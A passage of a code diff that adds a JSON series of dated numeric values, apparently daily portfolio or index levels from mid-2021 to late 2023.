"2021-06-23", + 10077.30393894943 + ], + [ + "2021-06-24", + 10078.486044126907 + ], + [ + "2021-06-25", + 10079.668287969711 + ], + [ + "2021-06-28", + 10080.850670494108 + ], + [ + "2021-06-29", + 10082.033191716368 + ], + [ + "2021-06-30", + 10083.215851652758 + ], + [ + "2021-07-01", + 10084.398650319552 + ], + [ + "2021-07-02", + 10085.581587733022 + ], + [ + "2021-07-06", + 10086.764663909444 + ], + [ + "2021-07-07", + 10087.947878865094 + ], + [ + "2021-07-08", + 10089.131232616253 + ], + [ + "2021-07-09", + 10090.314725179202 + ], + [ + "2021-07-12", + 10091.498356570224 + ], + [ + "2021-07-13", + 10092.682126805605 + ], + [ + "2021-07-14", + 10093.86603590163 + ], + [ + "2021-07-15", + 10095.050083874588 + ], + [ + "2021-07-16", + 10096.234270740772 + ], + [ + "2021-07-19", + 10097.418596516472 + ], + [ + "2021-07-20", + 10098.603061217986 + ], + [ + "2021-07-21", + 10099.787664861606 + ], + [ + "2021-07-22", + 10100.972407463632 + ], + [ + "2021-07-23", + 10102.157289040368 + ], + [ + "2021-07-26", + 10103.342309608111 + ], + [ + "2021-07-27", + 10104.52746918317 + ], + [ + "2021-07-28", + 10105.712767781846 + ], + [ + "2021-07-29", + 10106.898205420452 + ], + [ + "2021-07-30", + 10108.083782115295 + ], + [ + "2021-08-02", + 10109.269497882686 + ], + [ + "2021-08-03", + 10110.45535273894 + ], + [ + "2021-08-04", + 10111.641346700373 + ], + [ + "2021-08-05", + 10112.827479783304 + ], + [ + "2021-08-06", + 10114.01375200405 + ], + [ + "2021-08-09", + 10115.200163378933 + ], + [ + "2021-08-10", + 10116.386713924276 + ], + [ + "2021-08-11", + 10117.573403656404 + ], + [ + "2021-08-12", + 10118.760232591647 + ], + [ + "2021-08-13", + 10119.94720074633 + ], + [ + "2021-08-16", + 10121.134308136787 + ], + [ + "2021-08-17", + 10122.321554779348 + ], + [ + "2021-08-18", + 10123.50894069035 + ], + [ + "2021-08-19", + 10124.696465886129 + ], + [ + "2021-08-20", + 10125.884130383023 + ], + [ + "2021-08-23", + 10127.071934197375 + ], + [ + "2021-08-24", + 10128.259877345525 + ], + [ + "2021-08-25", + 10129.447959843817 + ], + [ + "2021-08-26", + 10130.6361817086 + ], + [ + "2021-08-27", + 10131.82454295622 + ], + [ + "2021-08-30", + 10133.013043603027 + ], + [ + "2021-08-31", + 10134.201683665375 + ], + [ + "2021-09-01", + 10135.390463159616 + ], + [ + "2021-09-02", + 10136.579382102107 + ], + [ + "2021-09-03", + 10137.768440509206 + ], + [ + "2021-09-07", + 10138.95763839727 + ], + [ + "2021-09-08", + 10140.146975782665 + ], + [ + "2021-09-09", + 10141.336452681751 + ], + [ + "2021-09-10", + 10142.526069110896 + ], + [ + "2021-09-13", + 10143.715825086465 + ], + [ + "2021-09-14", + 10144.905720624829 + ], + [ + "2021-09-15", + 10146.095755742359 + ], + [ + "2021-09-16", + 10147.285930455428 + ], + [ + "2021-09-17", + 10148.47624478041 + ], + [ + "2021-09-20", + 10146.676698733681 + ], + [ + "2021-09-21", + 10154.867131596859 + ], + [ + "2021-09-22", + 10158.965708512213 + ], + [ + "2021-09-23", + 10160.157392918538 + ], + [ + "2021-09-24", + 10161.34921711387 + ], + [ + "2021-09-27", + 10159.551181114604 + ], + [ + "2021-09-28", + 10050.97247921743 + ], + [ + "2021-09-29", + 10044.862676277628 + ], + [ + "2021-09-30", + 10027.098001494087 + ], + [ + "2021-10-01", + 10074.201707526176 + ], + [ + "2021-10-04", + 9911.733942383236 + ], + [ + "2021-10-05", + 9967.252749911522 + ], + [ + "2021-10-06", + 9993.179565368795 + ], + [ + "2021-10-07", + 10016.370027380148 + ], + [ + "2021-10-08", + 10016.307096145121 + ], + [ + "2021-10-11", + 10031.7111946075 + ], + [ + "2021-10-12", + 10031.513357825523 + ], + [ + "2021-10-13", + 10051.068059593834 + ], + [ + "2021-10-14", + 10062.576326963626 + ], + [ + "2021-10-15", + 10063.756704537522 + ], + [ + "2021-10-18", + 10061.947220574091 + ], + [ + "2021-10-19", + 10080.921709539809 + ], + [ + "2021-10-20", + 10086.410452706998 + ], + [ + "2021-10-21", + 10094.250350897844 + ], + [ + "2021-10-22", + 10095.43444395238 + ], + [ + "2021-10-25", + 10093.628675905427 + ], + [ + "2021-10-26", + 10120.085318185456 + ], + [ + "2021-10-27", + 10124.639392773992 + ], + [ + "2021-10-28", + 10125.827050576 + ], + [ + "2021-10-29", + 10127.014847694678 + ], + [ + "2021-11-01", + 10128.20278414637 + ], + [ + "2021-11-02", + 10129.390859947418 + ], + [ + "2021-11-03", + 10130.57907511417 + ], + [ + "2021-11-04", + 10131.767429662974 + ], + [ + "2021-11-05", + 10132.95592361018 + ], + [ + "2021-11-08", + 10134.14455697214 + ], + [ + "2021-11-09", + 10135.333329765208 + ], + [ + "2021-11-10", + 10133.532242005738 + ], + [ + "2021-11-11", + 10144.655246071825 + ], + [ + "2021-11-12", + 10148.165488076449 + ], + [ + "2021-11-15", + 10149.355905576807 + ], + [ + "2021-11-16", + 10150.546462717559 + ], + [ + "2021-11-17", + 10151.737159515085 + ], + [ + "2021-11-18", + 10152.927995985767 + ], + [ + "2021-11-19", + 10154.11897214599 + ], + [ + "2021-11-22", + 10152.320088012139 + ], + [ + "2021-11-23", + 10148.011466002594 + ], + [ + "2021-11-24", + 10158.353282777292 + ], + [ + "2021-11-26", + 10107.034112397117 + ], + [ + "2021-11-29", + 10165.10774156849 + ], + [ + "2021-11-30", + 10118.815899402198 + ], + [ + "2021-12-01", + 10016.37904337838 + ], + [ + "2021-12-02", + 10073.418629868593 + ], + [ + "2021-12-03", + 9941.050363153348 + ], + [ + "2021-12-06", + 10032.295618951875 + ], + [ + "2021-12-07", + 10147.558274349236 + ], + [ + "2021-12-08", + 10168.207687185688 + ], + [ + "2021-12-09", + 10140.909221835442 + ], + [ + "2021-12-10", + 10179.007605851672 + ], + [ + "2021-12-13", + 10198.103328493908 + ], + [ + "2021-12-14", + 10173.427501214117 + ], + [ + "2021-12-15", + 10235.832440431792 + ], + [ + "2021-12-16", + 10163.435173505886 + ], + [ + "2021-12-17", + 10158.496023190508 + ], + [ + "2021-12-20", + 10159.65952807053 + ], + [ + "2021-12-21", + 10265.153432194998 + ], + [ + "2021-12-22", + 10311.588611709683 + ], + [ + "2021-12-23", + 10337.984664960619 + ], + [ + "2021-12-27", + 10361.244257639299 + ], + [ + "2021-12-28", + 10366.971623493762 + ], + [ + "2021-12-29", + 10383.211822570873 + ], + [ + "2021-12-30", + 10392.084079564785 + ], + [ + "2021-12-31", + 10383.79647591228 + ], + [ + "2022-01-03", + 10458.042945535703 + ], + [ + "2022-01-04", + 10415.643261151728 + ], + [ + "2022-01-05", + 10219.271327718552 + ], + [ + "2022-01-06", + 10223.10401495661 + ], + [ + "2022-01-07", + 10130.647982542761 + ], + [ + "2022-01-10", + 10147.618487972657 + ], + [ + "2022-01-11", + 10229.301482596671 + ], + [ + "2022-01-12", + 10258.20122292675 + ], + [ + "2022-01-13", + 10140.884037906808 + ], + [ + "2022-01-14", + 10195.351782844215 + ], + [ + "2022-01-18", + 9995.836566628857 + ], + [ + "2022-01-19", + 9936.969778267887 + ], + [ + "2022-01-20", + 9852.967688373668 + ], + [ + "2022-01-21", + 9673.156021755076 + ], + [ + "2022-01-24", + 9723.582399763322 + ], + [ + "2022-01-25", + 9585.981254341681 + ], + [ + "2022-01-26", + 9591.139911034692 + ], + [ + "2022-01-27", + 9551.343275996094 + ], + [ + "2022-01-28", + 9664.173604542932 + ], + [ + "2022-01-31", + 9719.480167811193 + ], + [ + "2022-02-01", + 9717.817395153656 + ], + [ + "2022-02-02", + 9747.047891716833 + ], + [ + "2022-02-03", + 9602.833328131834 + ], + [ + "2022-02-04", + 9668.542345194226 + ], + [ + "2022-02-07", + 9690.404934550103 + ], + [ + "2022-02-08", + 9800.955573298903 + ], + [ + "2022-02-09", + 9851.230688192272 + ], + [ + "2022-02-10", + 9813.59252576104 + ], + [ + "2022-02-11", + 9703.774803761484 + ], + [ + "2022-02-14", + 9762.893420737595 + ], + [ + "2022-02-15", + 9890.117724087298 + ], + [ + "2022-02-16", + 9903.279579717175 + ], + [ + "2022-02-17", + 9808.080598103143 + ], + [ + "2022-02-18", + 9774.074167043958 + ], + [ + "2022-02-22", + 9751.379420252626 + ], + [ + "2022-02-23", + 9651.048181314727 + ], + [ + "2022-02-24", + 9783.839838646223 + ], + [ + "2022-02-25", + 9845.348231761724 + ], + [ + "2022-02-28", + 9911.404950091046 + ], + [ + "2022-03-01", + 9923.396129116392 + ], + [ + "2022-03-02", + 9985.398498683078 + ], + [ + "2022-03-03", + 9950.732898845632 + ], + [ + "2022-03-04", + 9911.011319011925 + ], + [ + "2022-03-07", + 9695.681433362117 + ], + [ + "2022-03-08", + 9690.464940469212 + ], + [ + "2022-03-09", + 9783.37757555602 + ], + [ + "2022-03-10", + 9776.021762544753 + ], + [ + "2022-03-11", + 9727.993596929882 + ], + [ + "2022-03-14", + 9663.322140176591 + ], + [ + "2022-03-15", + 9736.6451093847 + ], + [ + "2022-03-16", + 9785.591027863473 + ], + [ + "2022-03-17", + 9797.058736509418 + ], + [ + "2022-03-18", + 9804.340729703934 + ], + [ + "2022-03-21", + 9803.412487718157 + ], + [ + "2022-03-22", + 9852.959410102492 + ], + [ + "2022-03-23", + 9842.00610514013 + ], + [ + "2022-03-24", + 9884.139365958625 + ], + [ + "2022-03-25", + 9885.298812214309 + ], + [ + "2022-03-28", + 9883.468394477344 + ], + [ + "2022-03-29", + 9935.014827062649 + ], + [ + "2022-03-30", + 9926.985523400133 + ], + [ + "2022-03-31", + 9906.504138542461 + ], + [ + "2022-04-01", + 9921.839124977327 + ], + [ + "2022-04-04", + 9987.03921131494 + ], + [ + "2022-04-05", + 9915.895421788522 + ], + [ + "2022-04-06", + 9824.094408001143 + ], + [ + "2022-04-07", + 9849.704673684815 + ], + [ + "2022-04-08", + 9778.15482596342 + ], + [ + "2022-04-11", + 9613.408796388836 + ], + [ + "2022-04-12", + 9614.331380924707 + ], + [ + "2022-04-13", + 9699.978609417278 + ], + [ + "2022-04-14", + 9624.130954307566 + ], + [ + "2022-04-18", + 9672.037942403033 + ], + [ + "2022-04-19", + 9739.2016126071 + ], + [ + "2022-04-20", + 9707.646452471008 + ], + [ + "2022-04-21", + 9634.794697144991 + ], + [ + "2022-04-22", + 9488.31420761635 + ], + [ + "2022-04-25", + 9547.199077055808 + ], + [ + "2022-04-26", + 9397.985118451208 + ], + [ + "2022-04-27", + 9406.09545443755 + ], + [ + "2022-04-28", + 9478.20873492875 + ], + [ + "2022-04-29", + 9361.680005714876 + ], + [ + "2022-05-02", + 9455.312415734581 + ], + [ + "2022-05-03", + 9485.458136555018 + ], + [ + "2022-05-04", + 9559.75519087438 + ], + [ + "2022-05-05", + 9418.148275348933 + ], + [ + "2022-05-06", + 9384.348645488946 + ], + [ + "2022-05-09", + 9209.698809737783 + ], + [ + "2022-05-10", + 9242.312255668345 + ], + [ + "2022-05-11", + 9177.759840259352 + ], + [ + "2022-05-12", + 9182.091470034004 + ], + [ + "2022-05-13", + 9273.380799194376 + ], + [ + "2022-05-16", + 9313.72435572072 + ], + [ + "2022-05-17", + 9369.690809923912 + ], + [ + "2022-05-18", + 9256.31809758322 + ], + [ + "2022-05-19", + 9246.821364659047 + ], + [ + "2022-05-20", + 9241.978374965222 + ], + [ + "2022-05-23", + 9299.160774971533 + ], + [ + "2022-05-24", + 9272.339066096101 + ], + [ + "2022-05-25", + 9312.839292069959 + ], + [ + "2022-05-26", + 9363.739453596027 + ], + [ + "2022-05-27", + 9369.768263830096 + ], + [ + "2022-05-31", + 9408.029424541053 + ], + [ + "2022-06-01", + 9410.40014294544 + ], + [ + "2022-06-02", + 9448.826473206405 + ], + [ + "2022-06-03", + 9446.94485564309 + ], + [ + "2022-06-06", + 9478.646408697867 + ], + [ + "2022-06-07", + 9501.20618857713 + ], + [ + "2022-06-08", + 9505.000385153486 + ], + [ + "2022-06-09", + 9478.849024009281 + ], + [ + "2022-06-10", + 9355.74671513019 + ], + [ + "2022-06-13", + 9245.55840778717 + ], + [ + "2022-06-14", + 9256.18948718424 + ], + [ + "2022-06-15", + 9296.914760204472 + ], + [ + "2022-06-16", + 9234.9722443321 + ], + [ + "2022-06-17", + 9267.568686985202 + ], + [ + "2022-06-21", + 9340.890772143473 + ], + [ + "2022-06-22", + 9347.394626644584 + ], + [ + "2022-06-23", + 9368.844668467209 + ], + [ + "2022-06-24", + 9387.746220420195 + ], + [ + "2022-06-27", + 9388.847437916385 + ], + [ + "2022-06-28", + 9386.958784589478 + ], + [ + "2022-06-29", + 9394.506495118667 + ], + [ + "2022-06-30", + 9386.77056248427 + ], + [ + "2022-07-01", + 9404.395851492996 + ], + [ + "2022-07-05", + 9437.583136552983 + ], + [ + "2022-07-06", + 9451.188610275953 + ], + [ + "2022-07-07", + 9472.878653678747 + ], + [ + "2022-07-08", + 9479.528096715962 + ], + [ + "2022-07-11", + 9484.910156671549 + ], + [ + "2022-07-12", + 9483.032771858312 + ], + [ + "2022-07-13", + 9495.569679188662 + ], + [ + "2022-07-14", + 9505.112108974388 + ], + [ + "2022-07-15", + 9520.73427578616 + ], + [ + "2022-07-18", + 9521.851093275141 + ], + [ + "2022-07-19", + 9519.97804177096 + ], + [ + "2022-07-20", + 9541.261193614013 + ], + [ + "2022-07-21", + 9548.367115474386 + ], + [ + "2022-07-22", + 9549.487174398086 + ], + [ + "2022-07-25", + 9550.607364708858 + ], + [ + "2022-07-26", + 9548.737686422113 + ], + [ + "2022-07-27", + 9572.150252169895 + ], + [ + "2022-07-28", + 9573.273100943856 + ], + [ + "2022-07-29", + 9574.396081432147 + ], + [ + "2022-08-01", + 9575.519193650221 + ], + [ + "2022-08-02", + 9573.65243761353 + ], + [ + "2022-08-03", + 9600.785232506683 + ], + [ + "2022-08-04", + 9604.753489324223 + ], + [ + "2022-08-05", + 9605.880162578986 + ], + [ + "2022-08-08", + 9607.006967996705 + ], + [ + "2022-08-09", + 9605.143905592886 + ], + [ + "2022-08-10", + 9632.926308141177 + ], + [ + "2022-08-11", + 9634.12313590733 + ], + [ + "2022-08-12", + 9641.089546451298 + ], + [ + "2022-08-15", + 9642.220482060507 + ], + [ + "2022-08-16", + 9643.351550332663 + ], + [ + "2022-08-17", + 9641.49275128333 + ], + [ + "2022-08-18", + 9651.89713243963 + ], + [ + "2022-08-19", + 9622.713430340185 + ], + [ + "2022-08-22", + 9559.318321934223 + ], + [ + "2022-08-23", + 9562.213684697246 + ], + [ + "2022-08-24", + 9573.938627081765 + ], + [ + "2022-08-25", + 9615.55823565433 + ], + [ + "2022-08-26", + 9495.137425162719 + ], + [ + "2022-08-29", + 9460.416249482796 + ], + [ + "2022-08-30", + 9438.211833507501 + ], + [ + "2022-08-31", + 9430.832108378963 + ], + [ + "2022-09-01", + 9437.438326502343 + ], + [ + "2022-09-02", + 9388.293636032795 + ], + [ + "2022-09-06", + 9391.121642587023 + ], + [ + "2022-09-07", + 9438.576412386925 + ], + [ + "2022-09-08", + 9457.835877408383 + ], + [ + "2022-09-09", + 9463.815292651509 + ], + [ + "2022-09-12", + 9488.591688910083 + ], + [ + "2022-09-13", + 9379.63528526002 + ], + [ + "2022-09-14", + 9408.36832414649 + ], + [ + "2022-09-15", + 9358.27851030026 + ], + [ + "2022-09-16", + 9333.487576154472 + ], + [ + "2022-09-19", + 9365.528511889715 + ], + [ + "2022-09-20", + 9360.415942747959 + ], + [ + "2022-09-21", + 9316.702385131242 + ], + [ + "2022-09-22", + 9298.4066240196 + ], + [ + "2022-09-23", + 9268.121998081955 + ], + [ + "2022-09-26", + 9260.696562594643 + ], + [ + "2022-09-27", + 9265.88972135015 + ], + [ + "2022-09-28", + 9294.84191816518 + ], + [ + "2022-09-29", + 9253.71752147257 + ], + [ + "2022-09-30", + 9213.246235992185 + ], + [ + "2022-10-03", + 9252.102878288591 + ], + [ + "2022-10-04", + 9272.118112524473 + ], + [ + "2022-10-05", + 9276.047992412236 + ], + [ + "2022-10-06", + 9278.128098340816 + ], + [ + "2022-10-07", + 9264.053088553585 + ], + [ + "2022-10-10", + 9262.845705667763 + ], + [ + "2022-10-11", + 9239.822546818414 + ], + [ + "2022-10-12", + 9243.629866612653 + ], + [ + "2022-10-13", + 9271.607654405361 + ], + [ + "2022-10-14", + 9233.80733205238 + ], + [ + "2022-10-17", + 9290.911236802545 + ], + [ + "2022-10-18", + 9296.192975999236 + ], + [ + "2022-10-19", + 9298.159670373845 + ], + [ + "2022-10-20", + 9298.139420466106 + ], + [ + "2022-10-21", + 9320.161699853381 + ], + [ + "2022-10-24", + 9329.770673554336 + ], + [ + "2022-10-25", + 9327.875090303569 + ], + [ + "2022-10-26", + 9304.781210810517 + ], + [ + "2022-10-27", + 9280.67834196537 + ], + [ + "2022-10-28", + 9331.440054893377 + ], + [ + "2022-10-31", + 9340.728165373697 + ], + [ + "2022-11-01", + 9326.4658654667 + ], + [ + "2022-11-02", + 9262.047192426997 + ], + [ + "2022-11-03", + 9216.711669247454 + ], + [ + "2022-11-04", + 9242.073696081388 + ], + [ + "2022-11-07", + 9265.463867539675 + ], + [ + "2022-11-08", + 9275.46763715319 + ], + [ + "2022-11-09", + 9265.47515759438 + ], + [ + "2022-11-10", + 9280.725487399632 + ], + [ + "2022-11-11", + 9305.748296070195 + ], + [ + "2022-11-14", + 9317.834240340735 + ], + [ + "2022-11-15", + 9327.40479265229 + ], + [ + "2022-11-16", + 9328.498931874907 + ], + [ + "2022-11-17", + 9326.603199444116 + ], + [ + "2022-11-18", + 9333.858992386364 + ], + [ + "2022-11-21", + 9342.6638811449 + ], + [ + "2022-11-22", + 9364.473405079474 + ], + [ + "2022-11-23", + 9373.733199518036 + ], + [ + "2022-11-25", + 9371.842773234832 + ], + [ + "2022-11-28", + 9373.720042497933 + ], + [ + "2022-11-29", + 9370.601531791397 + ], + [ + "2022-11-30", + 9410.5020753671 + ], + [ + "2022-12-01", + 9411.605962209587 + ], + [ + "2022-12-02", + 9409.719978542102 + ], + [ + "2022-12-05", + 9405.183604590866 + ], + [ + "2022-12-06", + 9374.837744169497 + ], + [ + "2022-12-07", + 9374.547254574967 + ], + [ + "2022-12-08", + 9410.590517509248 + ], + [ + "2022-12-09", + 9401.927390337563 + ], + [ + "2022-12-12", + 9432.905499037299 + ], + [ + "2022-12-13", + 9449.006735170035 + ], + [ + "2022-12-14", + 9447.884558898711 + ], + [ + "2022-12-15", + 9377.038764039273 + ], + [ + "2022-12-16", + 9364.707217554002 + ], + [ + "2022-12-19", + 9340.626327267937 + ], + [ + "2022-12-20", + 9343.01213994662 + ], + [ + "2022-12-21", + 9365.854208437895 + ], + [ + "2022-12-22", + 9334.418944579147 + ], + [ + "2022-12-23", + 9340.882102187617 + ], + [ + "2022-12-27", + 9311.780860863071 + ], + [ + "2022-12-28", + 9295.738307749343 + ], + [ + "2022-12-29", + 9336.804176411946 + ], + [ + "2022-12-30", + 9341.103638058637 + ], + [ + "2023-01-03", + 9347.435826906705 + ], + [ + "2023-01-04", + 9357.880926769036 + ], + [ + "2023-01-05", + 9338.855987671222 + ], + [ + "2023-01-06", + 9373.63834916868 + ], + [ + "2023-01-09", + 9392.662785926947 + ], + [ + "2023-01-10", + 9396.851774847766 + ], + [ + "2023-01-11", + 9397.954060459308 + ], + [ + "2023-01-12", + 9399.056475373045 + ], + [ + "2023-01-13", + 9400.159019604145 + ], + [ + "2023-01-17", + 9401.261693167779 + ], + [ + "2023-01-18", + 9402.364496079117 + ], + [ + "2023-01-19", + 9403.467428353333 + ], + [ + "2023-01-20", + 9404.5704900056 + ], + [ + "2023-01-23", + 9405.673681051096 + ], + [ + "2023-01-24", + 9406.777001504997 + ], + [ + "2023-01-25", + 9407.880451382487 + ], + [ + "2023-01-26", + 9408.984030698744 + ], + [ + "2023-01-27", + 9410.087739468954 + ], + [ + "2023-01-30", + 9411.191577708301 + ], + [ + "2023-01-31", + 9412.295545431974 + ], + [ + "2023-02-01", + 9413.39964265516 + ], + [ + "2023-02-02", + 9414.503869393051 + ], + [ + "2023-02-03", + 9415.608225660839 + ], + [ + "2023-02-06", + 9416.71271147372 + ], + [ + "2023-02-07", + 9417.817326846887 + ], + [ + "2023-02-08", + 9415.932071795542 + ], + [ + "2023-02-09", + 9410.325461578512 + ], + [ + "2023-02-10", + 9405.942275724397 + ], + [ + "2023-02-13", + 9439.538130829862 + ], + [ + "2023-02-14", + 9444.855845019621 + ], + [ + "2023-02-15", + 9442.973761686873 + ], + [ + "2023-02-16", + 9419.975628626082 + ], + [ + "2023-02-17", + 9414.953875858571 + ], + [ + "2023-02-21", + 9372.498454535018 + ], + [ + "2023-02-22", + 9372.053609424014 + ], + [ + "2023-02-23", + 9390.311955504452 + ], + [ + "2023-02-24", + 9365.200852532316 + ], + [ + "2023-02-27", + 9396.347025548424 + ], + [ + "2023-02-28", + 9395.961726959804 + ], + [ + "2023-03-01", + 9386.176201679034 + ], + [ + "2023-03-02", + 9408.014017701222 + ], + [ + "2023-03-03", + 9445.293554052898 + ], + [ + "2023-03-06", + 9460.805291962199 + ], + [ + "2023-03-07", + 9458.492602567276 + ], + [ + "2023-03-08", + 9473.637642640595 + ], + [ + "2023-03-09", + 9440.415881284194 + ], + [ + "2023-03-10", + 9400.306365482798 + ], + [ + "2023-03-13", + 9421.575891165898 + ], + [ + "2023-03-14", + 9445.47675534957 + ], + [ + "2023-03-15", + 9450.326042308367 + ], + [ + "2023-03-16", + 9452.817722732916 + ], + [ + "2023-03-17", + 9453.891271469574 + ], + [ + "2023-03-20", + 9455.000248025905 + ], + [ + "2023-03-21", + 9456.109354669303 + ], + [ + "2023-03-22", + 9457.21859141503 + ], + [ + "2023-03-23", + 9458.327958278347 + ], + [ + "2023-03-24", + 9459.437455274518 + ], + [ + "2023-03-27", + 9460.547082418805 + ], + [ + "2023-03-28", + 9461.656839726478 + ], + [ + "2023-03-29", + 9462.766727212806 + ], + [ + "2023-03-30", + 9463.876744893058 + ], + [ + "2023-03-31", + 9464.986892782505 + ], + [ + "2023-04-03", + 9466.097170896423 + ], + [ + "2023-04-04", + 9467.207579250087 + ], + [ + "2023-04-05", + 9468.318117858775 + ], + [ + "2023-04-06", + 9469.428786737766 + ], + [ + "2023-04-10", + 9470.539585902341 + ], + [ + "2023-04-11", + 9471.650515367784 + ], + [ + "2023-04-12", + 9472.76157514938 + ], + [ + "2023-04-13", + 9473.872765262413 + ], + [ + "2023-04-14", + 9474.984085722173 + ], + [ + "2023-04-17", + 9476.095536543951 + ], + [ + "2023-04-18", + 9477.207117743037 + ], + [ + "2023-04-19", + 9478.318829334727 + ], + [ + "2023-04-20", + 9479.430671334314 + ], + [ + "2023-04-21", + 9480.542643757097 + ], + [ + "2023-04-24", + 9481.654746618375 + ], + [ + "2023-04-25", + 9482.766979933449 + ], + [ + "2023-04-26", + 9483.879343717621 + ], + [ + "2023-04-27", + 9484.991837986197 + ], + [ + "2023-04-28", + 9486.104462754483 + ], + [ + "2023-05-01", + 9487.217218037786 + ], + [ + "2023-05-02", + 9488.330103851416 + ], + [ + "2023-05-03", + 9489.443120210686 + ], + [ + "2023-05-04", + 9490.556267130907 + ], + [ + "2023-05-05", + 9491.669544627397 + ], + [ + "2023-05-08", + 9492.782952715472 + ], + [ + "2023-05-09", + 9493.896491410449 + ], + [ + "2023-05-10", + 9495.010160727652 + ], + [ + "2023-05-11", + 9496.123960682402 + ], + [ + "2023-05-12", + 9497.237891290022 + ], + [ + "2023-05-15", + 9498.35195256584 + ], + [ + "2023-05-16", + 9499.466144525182 + ], + [ + "2023-05-17", + 9500.58046718338 + ], + [ + "2023-05-18", + 9501.694920555763 + ], + [ + "2023-05-19", + 9502.809504657665 + ], + [ + "2023-05-22", + 9503.924219504423 + ], + [ + "2023-05-23", + 9505.039065111372 + ], + [ + "2023-05-24", + 9506.154041493852 + ], + [ + "2023-05-25", + 9507.269148667201 + ], + [ + "2023-05-26", + 9508.384386646763 + ], + [ + "2023-05-30", + 9509.499755447883 + ], + [ + "2023-05-31", + 9510.615255085904 + ], + [ + "2023-06-01", + 9511.730885576177 + ], + [ + "2023-06-02", + 9512.84664693405 + ], + [ + "2023-06-05", + 9513.962539174872 + ], + [ + "2023-06-06", + 9515.078562314 + ], + [ + "2023-06-07", + 9516.194716366786 + ], + [ + "2023-06-08", + 9517.311001348588 + ], + [ + "2023-06-09", + 9518.427417274763 + ], + [ + "2023-06-12", + 9519.543964160674 + ], + [ + "2023-06-13", + 9520.66064202168 + ], + [ + "2023-06-14", + 9521.777450873145 + ], + [ + "2023-06-15", + 9522.894390730438 + ], + [ + "2023-06-16", + 9524.011461608925 + ], + [ + "2023-06-20", + 9525.128663523974 + ], + [ + "2023-06-21", + 9526.245996490956 + ], + [ + "2023-06-22", + 9527.363460525245 + ], + [ + "2023-06-23", + 9528.481055642214 + ], + [ + "2023-06-26", + 9529.598781857243 + ], + [ + "2023-06-27", + 9530.716639185706 + ], + [ + "2023-06-28", + 9531.834627642986 + ], + [ + "2023-06-29", + 9532.952747244464 + ], + [ + "2023-06-30", + 9534.070998005524 + ], + [ + "2023-07-03", + 9535.18937994155 + ], + [ + "2023-07-05", + 9536.307893067933 + ], + [ + "2023-07-06", + 9537.426537400059 + ], + [ + "2023-07-07", + 9538.54531295332 + ], + [ + "2023-07-10", + 9539.664219743107 + ], + [ + "2023-07-11", + 9540.783257784817 + ], + [ + "2023-07-12", + 9541.902427093844 + ], + [ + "2023-07-13", + 9543.02172768559 + ], + [ + "2023-07-14", + 9544.141159575449 + ], + [ + "2023-07-17", + 9545.260722778827 + ], + [ + "2023-07-18", + 9546.380417311128 + ], + [ + "2023-07-19", + 9547.500243187755 + ], + [ + "2023-07-20", + 9548.620200424117 + ], + [ + "2023-07-21", + 9549.74028903562 + ], + [ + "2023-07-24", + 9550.860509037679 + ], + [ + "2023-07-25", + 9551.980860445703 + ], + [ + "2023-07-26", + 9553.10134327511 + ], + [ + "2023-07-27", + 9554.221957541313 + ], + [ + "2023-07-28", + 9555.342703259732 + ], + [ + "2023-07-31", + 9556.463580445785 + ], + [ + "2023-08-01", + 9557.584589114895 + ], + [ + "2023-08-02", + 9558.705729282485 + ], + [ + "2023-08-03", + 9559.82700096398 + ], + [ + "2023-08-04", + 9560.948404174807 + ], + [ + "2023-08-07", + 9562.069938930397 + ], + [ + "2023-08-08", + 9563.191605246178 + ], + [ + "2023-08-09", + 9564.313403137585 + ], + [ + "2023-08-10", + 9565.435332620049 + ], + [ + "2023-08-11", + 9566.557393709008 + ], + [ + "2023-08-14", + 9567.679586419901 + ], + [ + "2023-08-15", + 9568.801910768167 + ], + [ + "2023-08-16", + 9569.924366769246 + ], + [ + "2023-08-17", + 9571.046954438583 + ], + [ + "2023-08-18", + 9572.169673791623 + ], + [ + "2023-08-21", + 9573.292524843811 + ], + [ + "2023-08-22", + 9574.4155076106 + ], + [ + "2023-08-23", + 9575.538622107437 + ], + [ + "2023-08-24", + 9576.661868349775 + ], + [ + "2023-08-25", + 9577.785246353069 + ], + [ + "2023-08-28", + 9578.908756132774 + ], + [ + "2023-08-29", + 9580.03239770435 + ], + [ + "2023-08-30", + 9581.156171083256 + ], + [ + "2023-08-31", + 9582.280076284951 + ], + [ + "2023-09-01", + 9583.404113324901 + ], + [ + "2023-09-05", + 9584.52828221857 + ], + [ + "2023-09-06", + 9585.652582981427 + ], + [ + "2023-09-07", + 9586.777015628937 + ], + [ + "2023-09-08", + 9587.901580176573 + ], + [ + "2023-09-11", + 9589.026276639806 + ], + [ + "2023-09-12", + 9590.151105034112 + ], + [ + "2023-09-13", + 9591.276065374966 + ], + [ + "2023-09-14", + 9592.401157677847 + ], + [ + "2023-09-15", + 9593.526381958232 + ], + [ + "2023-09-18", + 9594.651738231605 + ], + [ + "2023-09-19", + 9595.777226513448 + ], + [ + "2023-09-20", + 9596.902846819246 + ], + [ + "2023-09-21", + 9598.028599164487 + ], + [ + "2023-09-22", + 9599.154483564658 + ], + [ + "2023-09-25", + 9600.280500035251 + ], + [ + "2023-09-26", + 9601.406648591757 + ], + [ + "2023-09-27", + 9602.532929249672 + ], + [ + "2023-09-28", + 9603.65934202449 + ], + [ + "2023-09-29", + 9604.78588693171 + ], + [ + "2023-10-02", + 9605.91256398683 + ], + [ + "2023-10-03", + 9607.039373205356 + ], + [ + "2023-10-04", + 9608.166314602788 + ], + [ + "2023-10-05", + 9609.29338819463 + ], + [ + "2023-10-06", + 9610.42059399639 + ], + [ + "2023-10-09", + 9611.547932023577 + ], + [ + "2023-10-10", + 9612.675402291701 + ], + [ + "2023-10-11", + 9613.803004816275 + ], + [ + "2023-10-12", + 9614.930739612812 + ], + [ + "2023-10-13", + 9616.05860669683 + ], + [ + "2023-10-16", + 9617.186606083846 + ], + [ + "2023-10-17", + 9618.314737789378 + ], + [ + "2023-10-18", + 9619.44300182895 + ], + [ + "2023-10-19", + 9620.571398218082 + ], + [ + "2023-10-20", + 9621.699926972302 + ], + [ + "2023-10-23", + 9622.828588107137 + ], + [ + "2023-10-24", + 9623.957381638114 + ], + [ + "2023-10-25", + 9625.086307580765 + ], + [ + "2023-10-26", + 9626.21536595062 + ], + [ + "2023-10-27", + 9627.344556763217 + ], + [ + "2023-10-30", + 9625.48388003409 + ], + [ + "2023-10-31", + 9635.788488874729 + ], + [ + "2023-11-01", + 9643.37025164692 + ], + [ + "2023-11-02", + 9644.50145479132 + ], + [ + "2023-11-03", + 9645.632790630048 + ], + [ + "2023-11-06", + 9643.774259178674 + ], + [ + "2023-11-07", + 9657.726703192375 + ], + [ + "2023-11-08", + 9662.565836253452 + ], + [ + 